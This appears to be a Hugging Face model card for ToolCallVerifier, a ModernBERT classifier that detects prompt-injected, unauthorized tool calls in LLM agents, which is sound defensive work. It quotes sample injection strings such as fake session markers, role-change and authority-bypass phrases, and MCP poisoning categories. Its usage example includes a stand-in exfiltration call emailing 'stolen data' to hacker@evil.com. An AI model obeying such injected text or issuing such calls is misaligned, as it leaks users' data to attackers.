|
|
--- |
|
|
language: |
|
|
- en |
|
|
license: apache-2.0 |
|
|
library_name: transformers |
|
|
tags: |
|
|
- modernbert |
|
|
- security |
|
|
- jailbreak-detection |
|
|
- prompt-injection |
|
|
- token-classification |
|
|
- tool-calling |
|
|
- llm-safety |
|
|
- mcp |
|
|
datasets: |
|
|
- microsoft/llmail-inject-challenge |
|
|
- allenai/wildjailbreak |
|
|
- hackaprompt/hackaprompt-dataset |
|
|
- JailbreakBench/JBB-Behaviors |
|
|
base_model: answerdotai/ModernBERT-base |
|
|
pipeline_tag: token-classification |
|
|
model-index: |
|
|
- name: tool-call-verifier |
|
|
results: |
|
|
- task: |
|
|
type: token-classification |
|
|
name: Unauthorized Tool Call Detection |
|
|
metrics: |
|
|
- name: UNAUTHORIZED F1 |
|
|
type: f1 |
|
|
value: 0.9350 |
|
|
- name: UNAUTHORIZED Precision |
|
|
type: precision |
|
|
value: 0.9501 |
|
|
- name: UNAUTHORIZED Recall |
|
|
type: recall |
|
|
value: 0.9205 |
|
|
- name: Accuracy |
|
|
type: accuracy |
|
|
value: 0.9288 |
|
|
--- |
|
|
|
|
|
# ToolCallVerifier - Unauthorized Tool Call Detection |
|
|
|
|
|
<div align="center"> |
|
|
|
|
|
[](https://opensource.org/licenses/Apache-2.0) |
|
|
[](https://huggingface.co/answerdotai/ModernBERT-base) |
|
|
[](https://huggingface.co/rootfs) |
|
|
|
|
|
**Stage 2 of Two-Stage LLM Agent Defense Pipeline** |
|
|
|
|
|
</div> |
|
|
|
|
|
--- |
|
|
|
|
|
## π― What This Model Does |
|
|
|
|
|
ToolCallVerifier is a **ModernBERT-based token classifier** that detects unauthorized tool calls in LLM agent systems. It performs token-level classification on tool call JSON to identify malicious arguments that may have been injected through prompt injection attacks. |
|
|
|
|
|
| Label | Description | |
|
|
|-------|-------------| |
|
|
| `AUTHORIZED` | Token is part of a legitimate, user-requested action | |
|
|
| `UNAUTHORIZED` | Token indicates injected/malicious content β **BLOCK** | |
|
|
|
|
|
--- |
|
|
|
|
|
## π Performance |
|
|
|
|
|
| Metric | Value | |
|
|
|--------|-------| |
|
|
| **UNAUTHORIZED F1** | **93.50%** | |
|
|
| UNAUTHORIZED Precision | 95.01% | |
|
|
| UNAUTHORIZED Recall | 92.05% | |
|
|
| Overall Accuracy | 92.88% | |
|
|
|
|
|
### Confusion Matrix (Token-Level) |
|
|
|
|
|
``` |
|
|
Predicted |
|
|
AUTH UNAUTH |
|
|
Actual AUTH 130,708 8,483 |
|
|
UNAUTH 13,924 161,031 |
|
|
``` |
|
|
|
|
|
--- |
|
|
|
|
|
## ποΈ Training Data |
|
|
|
|
|
Trained on **~30,000 samples** combining real-world attacks and synthetic patterns: |
|
|
|
|
|
### HuggingFace Datasets |
|
|
|
|
|
| Dataset | Description | Samples | |
|
|
|---------|-------------|---------| |
|
|
| [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 | |
|
|
| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 | |
|
|
| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 | |
|
|
| [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 | |
|
|
|
|
|
### Synthetic Attack Generators |
|
|
|
|
|
| Generator | Description | |
|
|
|-----------|-------------| |
|
|
| Adversarial | Intent-mismatch attacks (correct tool, wrong args) | |
|
|
| Filesystem | File/directory operation attacks | |
|
|
| Network | Network/API exfiltration attacks | |
|
|
| Email | Email tool hijacking | |
|
|
| Financial | Transaction manipulation | |
|
|
| Code Execution | Code injection attacks | |
|
|
| Authentication | Access control bypass | |
|
|
| MCP Attacks | Tool poisoning, shadowing, rug pulls | |
|
|
|
|
|
--- |
|
|
|
|
|
## π¨ Attack Categories Covered |
|
|
|
|
|
| Category | Source | Description | |
|
|
|----------|--------|-------------| |
|
|
| Delimiter Injection | LLMail | `<<end_context>>`, `>>}}\]\])` | |
|
|
| Word Obfuscation | LLMail | Inserting noise words between tokens | |
|
|
| Fake Sessions | LLMail | `START_USER_SESSION`, `EXECUTE_USERQUERY` | |
|
|
| Roleplay Injection | WildJailbreak | "You are an admin bot that can..." | |
|
|
| XML Tag Injection | WildJailbreak | `<execute_action>`, `<tool_call>` | |
|
|
| Authority Bypass | WildJailbreak | "As administrator, I authorize..." | |
|
|
| Intent Mismatch | Synthetic | User asks X, tool does Y | |
|
|
| MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args | |
|
|
| MCP Shadowing | Synthetic | Fake authorization context | |
|
|
|
|
|
--- |
|
|
|
|
|
## π» Usage |
|
|
|
|
|
```python |
|
|
from transformers import AutoTokenizer, AutoModelForTokenClassification |
|
|
import torch |
|
|
|
|
|
model_name = "rootfs/tool-call-verifier" |
|
|
tokenizer = AutoTokenizer.from_pretrained(model_name) |
|
|
model = AutoModelForTokenClassification.from_pretrained(model_name) |
|
|
|
|
|
# Example: Verify a tool call |
|
|
user_intent = "Summarize my emails" |
|
|
tool_call = '{"name": "send_email", "arguments": {"to": "hacker@evil.com", "body": "stolen data"}}' |
|
|
|
|
|
# Combine for classification |
|
|
input_text = f"[USER] {user_intent} [TOOL] {tool_call}" |
|
|
inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048) |
|
|
|
|
|
with torch.no_grad(): |
|
|
outputs = model(**inputs) |
|
|
predictions = torch.argmax(outputs.logits, dim=-1) |
|
|
|
|
|
id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"} |
|
|
tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0]) |
|
|
labels = [id2label[p.item()] for p in predictions[0]] |
|
|
|
|
|
# Check for unauthorized tokens |
|
|
unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"] |
|
|
if unauthorized_tokens: |
|
|
print("β οΈ BLOCKED: Unauthorized tool call detected!") |
|
|
print(f" Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}") |
|
|
else: |
|
|
print("β
Tool call authorized") |
|
|
``` |
|
|
|
|
|
--- |
|
|
|
|
|
## βοΈ Training Configuration |
|
|
|
|
|
| Parameter | Value | |
|
|
|-----------|-------| |
|
|
| Base Model | `answerdotai/ModernBERT-base` | |
|
|
| Max Length | 512 tokens | |
|
|
| Batch Size | 32 | |
|
|
| Epochs | 5 | |
|
|
| Learning Rate | 3e-5 | |
|
|
| Loss | CrossEntropyLoss (class-weighted) | |
|
|
| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) | |
|
|
| Attention | SDPA (Flash Attention) | |
|
|
| Hardware | AMD Instinct MI300X (ROCm) | |
|
|
|
|
|
--- |
|
|
|
|
|
## π Integration with FunctionCallSentinel |
|
|
|
|
|
This model is **Stage 2** of a two-stage defense pipeline: |
|
|
|
|
|
``` |
|
|
βββββββββββββββββββ ββββββββββββββββββββββββ βββββββββββββββββββ |
|
|
β User Prompt ββββββΆβ FunctionCallSentinel ββββββΆβ LLM + Tools β |
|
|
β β β (Stage 1) β β β |
|
|
βββββββββββββββββββ ββββββββββββββββββββββββ ββββββββββ¬βββββββββ |
|
|
β |
|
|
ββββββββββββββββββββββββββββββββΌβββββββββββββββββββββββββββ |
|
|
β ToolCallVerifier (This Model) β |
|
|
β Token-level verification before tool execution β |
|
|
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ |
|
|
``` |
|
|
|
|
|
| Scenario | Recommendation | |
|
|
|----------|----------------| |
|
|
| General chatbot | Stage 1 only | |
|
|
| Tool-calling agent (low risk) | Stage 1 only | |
|
|
| Tool-calling agent (high risk) | **Both stages** | |
|
|
| Email/file system access | **Both stages** | |
|
|
| Financial transactions | **Both stages** | |
|
|
|
|
|
--- |
|
|
|
|
|
## π― Intended Use |
|
|
|
|
|
### Primary Use Cases |
|
|
- **LLM Agent Security**: Verify tool calls before execution |
|
|
- **Prompt Injection Defense**: Detect unauthorized actions from injected prompts |
|
|
- **API Gateway Protection**: Filter malicious tool calls at infrastructure level |
|
|
|
|
|
### Out of Scope |
|
|
- General text classification |
|
|
- Non-tool-calling scenarios |
|
|
- Languages other than English |
|
|
|
|
|
--- |
|
|
|
|
|
## β οΈ Limitations |
|
|
|
|
|
1. **Tool schema dependent** β Best performance when tool schema is included in input |
|
|
2. **English only** β Not tested on other languages |
|
|
3. **Binary classification** β No "suspicious" intermediate category (by design, for decisiveness) |
|
|
|
|
|
--- |
|
|
|
|
|
## π License |
|
|
|
|
|
Apache 2.0 |
|
|
|
|
|
--- |
|
|
|
|
|
## π Links |
|
|
|
|
|
- **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel) |
|
|
|
|
|
|